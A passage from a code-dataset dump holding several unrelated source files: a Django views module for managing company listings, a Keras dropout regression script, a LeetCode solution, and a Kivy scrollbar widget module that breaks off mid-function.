listArch.models.CompanyRetail import 
CompanyRetail\nfrom listArch.models.Setting import Setting\n\nfrom listArch.Forms.CompanyForm import CompanyForm\nfrom listArch.Forms.UserCompanyForm import UserCompanyForm\nfrom listArch.Forms.UserUpdateForm import UserUpdateForm\nfrom listArch.models.Company import Company\nfrom listArch.models.CompanyDefinition import CompanyDefinition\nfrom listArch.models.CompanySocialAccount import CompanySocialAccount\nfrom listArch.models.Definition import Definition\nfrom listArch.models.DefinitionDescription import DefinitionDescription\nfrom listArch.models.ProductDefinition import ProductDefinition\nfrom listArch.models.ProductImage import ProductImage\nfrom listArch.serializers.CompanySerializer import CompanySerializer\nfrom listArch.serializers.CompanySocialSerializer import CompanySocialSerializer\nfrom listArch.serializers.SocialMediaSerializer import SocialMediaSerializer\nfrom listArch.services import general_methods\nfrom oxiterp.settings.base import EMAIL_HOST_USER\n\n\n# Firma Ekle\ndef add_company(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company_form = CompanyForm(initial={'date': datetime.datetime.today().strftime(\"%d-%b-%Y\")})\n user_form = UserCompanyForm()\n\n company_all = Company.objects.all()\n\n if request.method == 'POST':\n try:\n company_form = CompanyForm(request.POST or None, request.FILES or None)\n\n data = request.POST.copy()\n data['username'] = data['email']\n user_form = UserCompanyForm(data)\n\n if company_form.is_valid() and user_form.is_valid():\n\n user = user_form.save(commit=False)\n\n group = Group.objects.get(name='Firma')\n user2 = user_form.save()\n password = User.objects.make_random_password()\n user.set_password(password)\n user2.groups.add(group)\n user.is_active = True\n user.username = user.email\n user.save()\n\n count = request.POST['social_row']\n count = count.split(',')\n array = []\n for count in count:\n array.append(count)\n\n company = Company(user=user, name=company_form.cleaned_data['name'],\n userDescription=company_form.cleaned_data['userDescription'],\n address=company_form.cleaned_data['address'],\n logo=company_form.cleaned_data['logo'],\n phone=company_form.cleaned_data['phone'],\n website=company_form.cleaned_data['website'],\n country=company_form.cleaned_data['country'],\n map=company_form.cleaned_data['map'],\n noOfEmployees=company_form.cleaned_data['noOfEmployees'],\n annualSales=company_form.cleaned_data['annualSales'],\n date=company_form.cleaned_data['date'],\n business_type=company_form.cleaned_data['business_type'],\n isSponsor=company_form.cleaned_data['isSponsor'],\n city=company_form.cleaned_data['city'],\n title=company_form.cleaned_data['title'],\n mobilePhone=company_form.cleaned_data['mobilePhone']\n\n )\n company.save()\n\n for service in company_form.cleaned_data['service']:\n company.service.add(service)\n\n if request.POST['retail'] == 'news':\n name = request.POST['retail-name']\n logo = request.FILES['retail-logo']\n retail_company = CompanyRetail(company=company, name=name, logo=logo)\n retail_company.save()\n company.retail = retail_company\n company.save()\n elif request.POST['retail'] == '':\n print('mağaza yok')\n else:\n retail = Company.objects.get(pk=int(request.POST['retail']))\n retail_company = CompanyRetail(company=retail, name=retail.name, logo=retail.logo)\n retail_company.save()\n\n count_value = request.POST['row_number']\n\n if count_value != '':\n count_value = count_value.split(',')\n array = []\n 
for count in count_value:\n array.append(count)\n\n for i in array:\n social = SocialMedia(name=request.POST['company_social[' + str(i) + '][name]'],\n link=request.POST['company_social[' + str(i) + '][link]'])\n social.save()\n company_social = CompanySocialAccount(company=company, social_account=social)\n company_social.save()\n\n email = Setting.objects.filter(name='email')\n if email:\n if email[0].isActive:\n subject, from_email, to = 'OXIT Kullanıcı Giriş Bilgileri', EMAIL_HOST_USER, user2.email\n text_content = 'Aşağıda ki bilgileri kullanarak sisteme giriş yapabilirsiniz.'\n html_content = '
Site adresi: oxit.com.tr'\n                    html_content = html_content + 'Kullanıcı Adı: ' + user2.username + ''\n                    html_content = html_content + 'Şifre: ' + password + '
'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n messages.success(request, 'Firma Bilgileri Başarıyla Kayıt Edilmiştir.')\n return redirect('listArch:firma-listesi')\n else:\n messages.warning(request, 'Alanları Kontrol Ediniz.')\n\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'company/add-company.html',\n {'company_form': company_form, 'user_form': user_form, 'company_all': company_all})\n\n\ndef return_companies(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n return render(request, 'company/company-list.html')\n\n\n@api_view()\ndef getCompany(pk):\n company = Company.objects.filter(pk=pk)\n data = CompanySerializer(company, many=True)\n\n responseData = {}\n responseData['company'] = data.data\n responseData['company'][0]\n return JsonResponse(responseData, safe=True)\n\n\n# Firma Düzenle\n@login_required\ndef update_company(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n user_form = UserUpdateForm(request.POST or None, instance=company.user)\n company_form = CompanyForm(request.POST or None, request.FILES or None, instance=company,\n initial={'date': company.date.strftime('%Y-%m-%d')})\n social_accounts = CompanySocialAccount.objects.filter(company=company)\n companies = Company.objects.all()\n retails = CompanyRetail.objects.filter(company=company)\n\n if request.method == 'POST':\n try:\n if user_form.is_valid() and company_form.is_valid():\n company.user.first_name = user_form.cleaned_data['first_name']\n company.user.last_name = user_form.cleaned_data['last_name']\n company.user.email = user_form.cleaned_data['email']\n company.user.username = user_form.cleaned_data['email']\n company.user.is_active = True\n company.user.save()\n company.logo = company_form.cleaned_data['logo']\n company.isSponsor = company_form.cleaned_data['isSponsor']\n company.title = company_form.cleaned_data['title']\n company.mobilePhone = company_form.cleaned_data['mobilePhone']\n company.phone = company_form.cleaned_data['phone']\n company.save()\n company_form.save()\n\n company.service.clear()\n for service in company_form.cleaned_data['service']:\n company.service.add(service)\n\n if request.POST['retail'] == 'news':\n name = request.POST['retail-name']\n logo = request.FILES['retail-logo']\n retail_company = CompanyRetail(name=name, logo=logo, company=company)\n retail_company.save()\n elif request.POST['retail'] == '':\n print('mağaza yok')\n else:\n retail = Company.objects.get(pk=int(request.POST['retail']))\n retail_company = CompanyRetail(company=company, name=retail.name, logo=retail.logo)\n retail_company.save()\n\n count_value = request.POST['row_number']\n\n if count_value != '':\n for social in social_accounts:\n account = SocialMedia.objects.filter(link=social.social_account.link)\n account.delete()\n social.delete()\n count_value = count_value.split(',')\n array = []\n for count in count_value:\n array.append(count)\n\n for i in array:\n social = SocialMedia(name=request.POST['company_social[' + str(i) + '][name]'],\n link=request.POST['company_social[' + str(i) + '][link]'])\n social.save()\n company_social 
= CompanySocialAccount(company=company, social_account=social)\n company_social.save()\n\n messages.success(request, 'Firma Başarıyla Güncellenmiştir.')\n return redirect('listArch:firma-listesi')\n else:\n messages.warning(request, 'Alanları Kontrol Edin.')\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'company/update-company.html',\n {'company_form': company_form, 'user_form': user_form, 'social_accounts': social_accounts,\n 'company': company,\n 'loop': social_accounts.count(), 'companies': companies, 'retails': retails,\n })\n\n\n@api_view()\ndef getSocialAccount(request, pk):\n socialAccount = SocialMedia.objects.filter(pk=pk)\n data = SocialMediaSerializer(socialAccount, many=True)\n\n responseData = {}\n responseData['socialMedia'] = data.data\n responseData['socialMedia'][0]\n return JsonResponse(responseData, safe=True)\n\n\n@api_view()\ndef getSocialMedia(request, pk):\n company_accounts = CompanySocialAccount.objects.filter(company=Company.objects.get(pk=pk))\n data = CompanySocialSerializer(company_accounts, many=True)\n\n responseData = {}\n responseData['company_accounts'] = data.data\n responseData['company_accounts'][0]\n return JsonResponse(responseData, safe=True)\n\n\n@api_view(http_method_names=['POST'])\ndef edit_social_account(request):\n if request.POST:\n try:\n\n social_account_id = request.POST.get('social_id')\n social_accounts = SocialMedia.objects.filter(pk=social_account_id)\n\n company_accounts = CompanySocialAccount.objects.filter(social_account=social_accounts[0])\n\n name = request.POST['name']\n link = request.POST['link']\n\n for social_account in social_accounts:\n\n social_account.link = link\n social_account.name = name\n social_account.save()\n for company_account in company_accounts:\n company_account.social_account = social_account\n company_account.save()\n\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef edit_code(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n code = CompanyCode.objects.get(pk=pk)\n try:\n if request.method == 'POST':\n code.code = request.POST['company-code']\n code.save()\n\n messages.success(request, \"Kod Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-kodu-ekle', code.company.pk)\n except Exception as e:\n print(e)\n\n return render(request, 'company/company-add-code.html', {'code': code})\n\n\ndef add_companyDefinition(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n\n if request.method == 'POST':\n try:\n\n definition = Definition(key=request.POST['title[tr]'])\n definition.save()\n\n definitionDesc = DefinitionDescription(definition=definition, lang_code=1,\n title_desc=request.POST['title[tr]'],\n description=request.POST['content[tr]'])\n definitionDesc.save()\n\n definitionDesc2 = DefinitionDescription(definition=definition, lang_code=2,\n title_desc=request.POST['title[eng]'],\n description=request.POST['content[eng]'])\n definitionDesc2.save()\n\n company_definition = CompanyDefinition(company=company, definition=definition)\n company_definition.save()\n\n messages.success(request, \"Açıklama Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-listesi')\n\n except Exception as e:\n print(e)\n return 
redirect('listArch:admin-error-sayfasi')\n return render(request, 'product/add-product-definition.html', )\n\n\ndef get_company_definition(request, pk):\n company = Company.objects.get(pk=pk)\n company_def = CompanyDefinition.objects.filter(company=company)\n definitionDesc = []\n definitionDesc2 = []\n if company_def.count() > 0:\n definitionDesc = DefinitionDescription.objects.filter(lang_code=1).filter(\n definition=company_def[0].definition)\n definitionDesc2 = DefinitionDescription.objects.filter(lang_code=2).filter(\n definition=company_def[0].definition)\n if company_def.count() > 0:\n\n if request.method == 'POST':\n try:\n\n for definition in company_def:\n definition.definition.key = request.POST['title[tr]']\n definition.definition.save()\n\n for definition_tr in definitionDesc:\n definition_tr.title_desc = request.POST['title[tr]']\n definition_tr.description = request.POST['content[tr]']\n definition_tr.save()\n\n for definition_eng in definitionDesc2:\n definition_eng.title_desc = request.POST['title[eng]']\n definition_eng.description = request.POST['content[eng]']\n definition_eng.save()\n\n messages.success(request, \"Açıklama Başarıyla Düzenlendi.\")\n return redirect('listArch:firma-listesi')\n\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'product/product-definition-update.html',\n {'def_tr': definitionDesc[0], 'def_eng': definitionDesc2[0]})\n else:\n return redirect('listArch:firma-aciklama-ekle', pk)\n\n\n@login_required\ndef company_delete(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n company_id = request.POST['company_id']\n company = Company.objects.filter(pk=company_id)\n company[0].delete()\n\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef return_company_products(request):\n user = request.user\n company = Company.objects.get(user=user)\n array = []\n category_products = Product.objects.filter(category__is_parent=True).filter(company=company).values(\n 'category').annotate(dcount=Count('category'))\n for category_product in category_products:\n product_categories = Product.objects.filter(company=company).filter(\n category=Category.objects.get(pk=category_product['category'])).order_by('?')[:4]\n category_dict = dict()\n category_dict['category'] = Category.objects.get(pk=category_product['category'])\n category_dict['products'] = product_categories\n array.append(category_dict)\n return render(request, 'company/company-products.html', {'products': array})\n\n\ndef company_category_products(request, pk):\n category = Category.objects.filter(pk=pk)\n category_products = Product.objects.filter(category__in=category)\n return render(request, 'company/company-category-products.html',\n {'category_products': category_products, 'category': category})\n\n\ndef company_product_detail(request, pk):\n product = Product.objects.get(pk=pk)\n product_image = ProductImage.objects.filter(product=Product.objects.get(pk=pk))\n array = []\n options_value = ProductOptionValue.objects.filter(product=product).values('option_value__option').annotate(\n count=Count('option_value__value'))\n for option in options_value:\n option_dict = dict()\n option_dict['option'] = 
Option.objects.filter(pk=option['option_value__option'])[0]\n option_dict['values'] = OptionValue.objects.filter(\n option=Option.objects.filter(pk=option['option_value__option'])[0])\n array.append(option_dict)\n descriptions = ProductDefinition.objects.filter(product=product)\n return render(request, 'company/company-product-detail.html',\n {'product': product, 'product_images': product_image,\n 'options': array, 'definitions': descriptions})\n\n\ndef delete_retail(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n retail_id = request.POST['retail_id']\n retail = CompanyRetail.objects.get(pk=retail_id)\n retail.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef delete_code(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.POST:\n try:\n\n code_id = request.POST['code_id']\n code = CompanyCode.objects.get(pk=int(code_id))\n code.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef add_company_codes(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n company = Company.objects.get(pk=pk)\n codes = CompanyCode.objects.filter(company=company)\n try:\n if request.method == 'POST':\n code = CompanyCode(company=company, code=request.POST['company-code'])\n code.save()\n\n messages.success(request, \"Kod Başarıyla Kayıt Edildi.\")\n return redirect('listArch:firma-kodu-ekle', pk)\n except Exception as e:\n print(e)\n\n return render(request, 'company/company-add-code.html', {'codes': codes})\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/CompanyViews.py","file_name":"CompanyViews.py","file_ext":"py","file_size_in_byte":21911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12170290374","text":"from sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.preprocessing import MaxAbsScaler, RobustScaler \nimport numpy as np\nimport pandas as pd\nfrom tensorflow.python.keras.models import Sequential, Model, load_model\nfrom tensorflow.python.keras.layers import Dense, Input, Dropout\nfrom sklearn.metrics import r2_score, accuracy_score\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.keras.callbacks import EarlyStopping, ModelCheckpoint\n\ndatasets = load_boston()\nx = datasets.data\ny = datasets['target']\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=66)\n\n# scaler = MinMaxScaler()\n# scaler = StandardScaler()\n# scaler = MaxAbsScaler()\nscaler = RobustScaler()\n\nscaler.fit(x_train)\nx_train = scaler.transform(x_train)\nx_test = scaler.transform(x_test)\n\n#2. 
Build the model\ninput1 = Input(shape=(13,))\ndense1 = Dense(32)(input1)\ndense2 = Dense(32)(dense1)\ndrop1 = Dropout(0.2)(dense2) # randomly drops 20% of the nodes of the layer right above (using Dropout like this usually improves performance)\ndense3 = Dense(32)(drop1)\ndrop2 = Dropout(0.1)(dense3)\ndense4 = Dense(32)(drop2)\ndrop3 = Dropout(0.1)(dense4)\ndense5 = Dense(32)(dense4) # note: dense5 is wired to dense4, so drop3 above is defined but never actually used\noutput1 = Dense(1)(dense5)\nmodel = Model(inputs=input1, outputs=output1)\n\n#3. Compile and train\nmodel.compile(loss='mse', optimizer='adam')\nes = EarlyStopping(monitor='val_loss', patience=50, mode='min', verbose=1, restore_best_weights=True)\n# mcp = ModelCheckpoint(monitor='val_loss', mode='auto', verbose=1,\n#                      save_best_only=True,\n#                      filepath='./_ModelCheckPoint/keras24_ModelCheckPoint.hdf5'\n#                      )\nhist = model.fit(x_train, y_train, epochs=500, batch_size=10, verbose=1, validation_split=0.15, callbacks=[es])\n\n#4. Evaluate and predict <-- Dropout is not applied here; the full model is used\nloss = model.evaluate(x_test, y_test)\nprint('loss : ', loss)\n\ny_predict = model.predict(x_test)\nr2 = r2_score(y_test, y_predict)\nprint('r2 score : ', r2)\n\n\n# Unscaled             MinMax               Standard             MaxAbs               Robust\n# loss : 17.94440269470215  15.174883842468262  19.268272399902344  15.438285827636719  20.521202087402344\n# r2 :   0.7853102126165242  0.8184451978918657  0.7694712272474835  0.8152938097680617  0.7544809681427924\n# Functional API  13.969481468200684\n#                 0.8328668305394888\n# Dropout  15.865423202514648  16.704450607299805  15.497111320495605  16.57057762145996\n#          0.810183480265888   0.800145226034957   0.8145900164278385  0.8017468844811555 ","repo_name":"SuperMindu/studyhome","sub_path":"keras/개념정리/keras26_dropout정리.py","file_name":"keras26_dropout정리.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3941868097","text":"class Solution(object):\n    def numIdenticalPairs(self, nums):\n        nums.sort()\n        print(nums)\n        counter = 0\n        for i in range(len(nums)):\n            for j in range(i+1, len(nums)):\n                if nums[i] == nums[j]:\n                    counter = counter+1\n\n        return counter\n","repo_name":"Beki4382/Competitive-Programming","sub_path":"NumberOfGoodPairs.py","file_name":"NumberOfGoodPairs.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25116622738","text":"from functools import partial\r\nfrom kivy.app import App\r\nfrom kivy.input.motionevent import MotionEvent\r\nfrom kivy.metrics import dp  # used by BasicScroller.scroll_to_widget below\r\nfrom kivy.properties import NumericProperty, AliasProperty, ObjectProperty, ListProperty, ColorProperty, BooleanProperty\r\nfrom kivy.lang.builder import Builder\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.clock import Clock\r\nfrom kivy.animation import Animation\r\nfrom kivy.uix.stencilview import StencilView\r\nfrom kivy.config import Config\r\n# When we are generating documentation, Config doesn't exist\r\n_scroll_timeout = _scroll_distance = 0\r\nif Config:\r\n    _scroll_timeout = Config.getint('widgets', 'scroll_timeout')\r\n    _scroll_distance = '{}sp'.format(Config.getint('widgets', 'scroll_distance'))\r\n\r\nBuilder.load_string(\"\"\"\r\n<ScrollBarX>:\r\n    _handle_x_pos: self.x + self.width * self.hbar[0], self.y\r\n    _handle_x_size: self.width * self.hbar[1], self.height\r\n    canvas:\r\n        Color:\r\n            rgba: self._bar_color if (self.viewport_size[0] > self.scroller_size[0]) else [0, 0, 0, 0]\r\n        Rectangle:\r\n            pos: root._handle_x_pos or (0, 0)\r\n            size: root._handle_x_size or (0, 0)\r\n    size_hint_y: None\r\n    orientation: 'horizontal'\r\n    height: 
40\r\n\r\n<ScrollBarY>:\r\n    _handle_y_pos: self.x, self.y + self.height * self.vbar[0]\r\n    _handle_y_size: self.width, self.height * self.vbar[1]\r\n    canvas:\r\n        Color:\r\n            rgba: self._bar_color if (self.viewport_size[1] > self.scroller_size[1]) else [0, 0, 0, 0]\r\n        Rectangle:\r\n            pos: root._handle_y_pos or (0, 0)\r\n            size: root._handle_y_size or (0, 0)\r\n    size_hint_x: None\r\n    orientation: 'vertical'\r\n    width: 40\r\n\"\"\")\r\n\r\nclass ScrollBar(BoxLayout):\r\n    \"\"\"\r\n    Base class for a basic scrollbar widget that can control a set ScrollView.\r\n    This class itself should not be used; use ScrollBarX or ScrollBarY for horizontal or vertical scrolling.\r\n    The 'scroller' variable must be set to the ScrollView widget that should be controlled.\r\n    'bar_color' and 'bar_inactive_color' can be set to an rgba color.\r\n    \"\"\"\r\n\r\n    scroll = NumericProperty()\r\n    scroller = ObjectProperty(allownone=True)\r\n    scroll_wheel_distance = NumericProperty('20sp')\r\n    bar_color = ColorProperty([.7, .7, .7, .9])\r\n    bar_inactive_color = ColorProperty([.7, .7, .7, .2])\r\n    viewport_size = ListProperty([0, 0])\r\n    scroller_size = ListProperty([0, 0])\r\n\r\n    _bar_color = ListProperty([0, 0, 0, 0])\r\n    _bind_inactive_bar_color_ev = None\r\n\r\n    def _set_scroller_size(self, instance, value):\r\n        self.scroller_size = value\r\n\r\n    def _set_viewport_size(self, instance, value):\r\n        self.viewport_size = value\r\n\r\n    def _set_scroll(self, instance, value):\r\n        self.scroll = value\r\n\r\n    def _bind_inactive_bar_color(self, *l):\r\n        self.funbind('bar_color', self._change_bar_color)\r\n        self.fbind('bar_inactive_color', self._change_bar_color)\r\n        Animation(_bar_color=self.bar_inactive_color, d=.5, t='out_quart').start(self)\r\n\r\n    def _change_bar_color(self, inst, value):\r\n        self._bar_color = value\r\n\r\n    def __init__(self, **kwargs):\r\n        super().__init__(**kwargs)\r\n        self.update_bar_color()\r\n\r\n    def on_touch_down(self, touch):\r\n        if not self.disabled and self.collide_point(*touch.pos):\r\n            touch.grab(self)\r\n            if 'button' in touch.profile and touch.button.startswith('scroll'):\r\n                btn = touch.button\r\n                scroll_direction = ''\r\n                if btn in ('scrollup', 'scrollright'):\r\n                    scroll_direction = 'up'\r\n                elif btn in ('scrolldown', 'scrollleft'):\r\n                    scroll_direction = 'down'\r\n                return self.wheel_scroll(scroll_direction)\r\n\r\n            self.do_touch_scroll(touch)\r\n            return True\r\n\r\n    def on_touch_move(self, touch):\r\n        if touch.grab_current == self:\r\n            self.do_touch_scroll(touch)\r\n\r\n    def do_touch_scroll(self, touch):\r\n        pass\r\n\r\n    def on_scroller(self, instance, value):\r\n        if value:\r\n            value.bind(size=self._set_scroller_size)\r\n            value.bind(viewport_size=self._set_viewport_size)\r\n            self.scroller_size = value.size\r\n            self.viewport_size = value.viewport_size\r\n\r\n    def update_bar_color(self):\r\n        ev = self._bind_inactive_bar_color_ev\r\n        if ev is None:\r\n            ev = self._bind_inactive_bar_color_ev = Clock.create_trigger(\r\n                self._bind_inactive_bar_color, .5)\r\n        self.funbind('bar_inactive_color', self._change_bar_color)\r\n        Animation.stop_all(self, '_bar_color')\r\n        self.fbind('bar_color', self._change_bar_color)\r\n        self._bar_color = self.bar_color\r\n        ev()\r\n\r\n    def wheel_scroll(self, direction):\r\n        return False\r\n\r\n\r\nclass ScrollBarX(ScrollBar):\r\n    \"\"\"Horizontal scrollbar widget. 
See 'ScrollBar' for more information.\"\"\"\r\n\r\n scroll = NumericProperty(0.)\r\n def _get_hbar(self):\r\n vw = self.viewport_size[0]\r\n w = self.scroller_size[0]\r\n if vw < w or vw == 0:\r\n return 0, 1.\r\n pw = max(0.01, w / float(vw))\r\n sx = min(1.0, max(0.0, self.scroll))\r\n px = (1. - pw) * sx\r\n return (px, pw)\r\n hbar = AliasProperty(_get_hbar, bind=('scroller_size', 'scroll', 'viewport_size', 'width'), cache=True)\r\n\r\n def on_scroller(self, instance, value):\r\n super().on_scroller(instance, value)\r\n if value:\r\n value.bind(scroll_x=self._set_scroll)\r\n self.scroll = value.scroll_x\r\n\r\n def on_scroll(self, instance, value):\r\n if self.scroller is not None:\r\n self.scroller.scroll_x = value\r\n\r\n def do_touch_scroll(self, touch):\r\n self.update_bar_color()\r\n scroll_scale = (self.width - self.width * self.hbar[1])\r\n if scroll_scale == 0:\r\n return\r\n scroll_amount = touch.dx / scroll_scale\r\n self.scroll = min(max(self.scroll + scroll_amount, 0.), 1.)\r\n\r\n def wheel_scroll(self, direction):\r\n if (direction == 'up' and self.scroll >= 1) or (direction == 'down' and self.scroll <= 0):\r\n return False\r\n \r\n if self.viewport_size[0] > self.scroller_size[0]:\r\n scroll_percent = self.scroll_wheel_distance / self.viewport_size[0]\r\n if direction == 'up':\r\n new_scroll = self.scroll - scroll_percent\r\n else:\r\n new_scroll = self.scroll + scroll_percent\r\n self.scroll = min(max(new_scroll, 0), 1)\r\n return True\r\n return False\r\n\r\n\r\nclass ScrollBarY(ScrollBar):\r\n \"\"\"Vertical scrollbar widget. See 'ScrollBar' for more information.\"\"\"\r\n\r\n scroll = NumericProperty(1.)\r\n def _get_vbar(self):\r\n vh = self.viewport_size[1]\r\n h = self.scroller_size[1]\r\n if vh < h or vh == 0:\r\n return 0, 1.\r\n ph = max(0.01, h / float(vh))\r\n sy = min(1.0, max(0.0, self.scroll))\r\n py = (1. - ph) * sy\r\n return (py, ph)\r\n vbar = AliasProperty(_get_vbar, bind=('scroller_size', 'scroll', 'viewport_size', 'height'), cache=True)\r\n\r\n def on_scroller(self, instance, value):\r\n super().on_scroller(instance, value)\r\n if value:\r\n value.bind(scroll_y=self._set_scroll)\r\n self.scroll = value.scroll_y\r\n\r\n def on_scroll(self, instance, value):\r\n if self.scroller is not None:\r\n self.scroller.scroll_y = value\r\n \r\n def do_touch_scroll(self, touch):\r\n self.update_bar_color()\r\n scroll_scale = (self.height - self.height * self.vbar[1])\r\n if scroll_scale == 0:\r\n return\r\n scroll_amount = touch.dy / scroll_scale\r\n self.scroll = min(max(self.scroll + scroll_amount, 0.), 1.)\r\n\r\n def wheel_scroll(self, direction):\r\n if (direction == 'up' and self.scroll >= 1) or (direction == 'down' and self.scroll <= 0):\r\n return False\r\n \r\n if self.viewport_size[1] > self.scroller_size[1]:\r\n scroll_percent = self.scroll_wheel_distance / self.viewport_size[1]\r\n if direction == 'up':\r\n new_scroll = self.scroll - scroll_percent\r\n else:\r\n new_scroll = self.scroll + scroll_percent\r\n self.scroll = min(max(new_scroll, 0), 1)\r\n return True\r\n return False\r\n\r\n\r\nclass BasicScroller(StencilView):\r\n \"\"\"\r\n Simplified version of Kivy's ScrollView. 
Removes scrollbars and any touch control.\r\n \"\"\"\r\n\r\n scroll_x = NumericProperty(0.)\r\n scroll_y = NumericProperty(1.)\r\n viewport_size = ListProperty([0, 0])\r\n\r\n _viewport = ObjectProperty(None, allownone=True)\r\n\r\n def _set_viewport_size(self, instance, value):\r\n self.viewport_size = value\r\n\r\n def on__viewport(self, instance, value):\r\n if value:\r\n value.bind(size=self._set_viewport_size)\r\n self.viewport_size = value.size\r\n\r\n def __init__(self, **kwargs):\r\n self._trigger_update_from_scroll = Clock.create_trigger(\r\n self.update_from_scroll, -1)\r\n # create a specific canvas for the viewport\r\n from kivy.graphics import PushMatrix, Translate, PopMatrix, Canvas\r\n self.canvas_viewport = Canvas()\r\n self.canvas = Canvas()\r\n with self.canvas_viewport.before:\r\n PushMatrix()\r\n self.g_translate = Translate(0, 0)\r\n with self.canvas_viewport.after:\r\n PopMatrix()\r\n\r\n super().__init__(**kwargs)\r\n\r\n # now add the viewport canvas to our canvas\r\n self.canvas.add(self.canvas_viewport)\r\n\r\n trigger_update_from_scroll = self._trigger_update_from_scroll\r\n fbind = self.fbind\r\n fbind('scroll_x', trigger_update_from_scroll)\r\n fbind('scroll_y', trigger_update_from_scroll)\r\n fbind('pos', trigger_update_from_scroll)\r\n fbind('size', trigger_update_from_scroll)\r\n\r\n trigger_update_from_scroll()\r\n\r\n def transformed_touch(self, touch, touch_type='down'):\r\n touch.push()\r\n touch.apply_transform_2d(self.to_local)\r\n #touch.apply_transform_2d(self.to_widget)\r\n if touch_type == 'down':\r\n ret = super().on_touch_down(touch)\r\n elif touch_type == 'up':\r\n ret = super().on_touch_up(touch)\r\n elif touch_type == 'move':\r\n ret = super().on_touch_move(touch)\r\n touch.pop()\r\n return ret\r\n\r\n def on_touch_down(self, touch):\r\n return self.do_touch_down(touch)\r\n \r\n def on_touch_move(self, touch):\r\n return self.do_touch_move(touch)\r\n\r\n def on_touch_up(self, touch):\r\n return self.do_touch_up(touch)\r\n\r\n def do_touch_down(self, touch):\r\n if self.collide_point(*touch.pos):\r\n return self.transformed_touch(touch, touch_type='down')\r\n\r\n def do_touch_move(self, touch):\r\n return self.transformed_touch(touch, touch_type='move')\r\n\r\n def do_touch_up(self, touch):\r\n return self.transformed_touch(touch, touch_type='up')\r\n\r\n def to_local(self, x, y, **k):\r\n tx, ty = self.g_translate.xy\r\n return x - tx, y - ty\r\n\r\n def to_parent(self, x, y, **k):\r\n tx, ty = self.g_translate.xy\r\n return x + tx, y + ty\r\n\r\n def _apply_transform(self, m, pos=None):\r\n tx, ty = self.g_translate.xy\r\n m.translate(tx, ty, 0)\r\n return super()._apply_transform(m, (0, 0))\r\n\r\n def scroll_to_widget(self, widget, padding=10, animate=True):\r\n '''Scrolls the viewport to ensure that the given widget is visible,\r\n optionally with padding and animation. If animate is True (the\r\n default), then the default animation parameters will be used.\r\n Otherwise, it should be a dict containing arguments to pass to\r\n :class:`~kivy.animation.Animation` constructor.\r\n .. 
versionadded:: 1.9.1\r\n '''\r\n if not self.parent:\r\n return\r\n\r\n # if _viewport is layout and has pending operation, reschedule\r\n if hasattr(self._viewport, 'do_layout'):\r\n if self._viewport._trigger_layout.is_triggered:\r\n Clock.schedule_once(\r\n lambda *dt: self.scroll_to_widget(widget, padding, animate))\r\n return\r\n\r\n if isinstance(padding, (int, float)):\r\n padding = (padding, padding)\r\n\r\n pos = self.parent.to_widget(*widget.to_window(*widget.pos))\r\n cor = self.parent.to_widget(*widget.to_window(widget.right, widget.top))\r\n\r\n dx = dy = 0\r\n\r\n if pos[1] < self.y:\r\n dy = self.y - pos[1] + dp(padding[1])\r\n elif cor[1] > self.top:\r\n dy = self.top - cor[1] - dp(padding[1])\r\n\r\n if pos[0] < self.x:\r\n dx = self.x - pos[0] + dp(padding[0])\r\n elif cor[0] > self.right:\r\n dx = self.right - cor[0] - dp(padding[0])\r\n\r\n dsx, dsy = self.convert_distance_to_scroll(dx, dy)\r\n sxp = min(1, max(0, self.scroll_x - dsx))\r\n syp = min(1, max(0, self.scroll_y - dsy))\r\n\r\n if animate:\r\n if animate is True:\r\n animate = {'d': 0.2, 't': 'out_quad'}\r\n 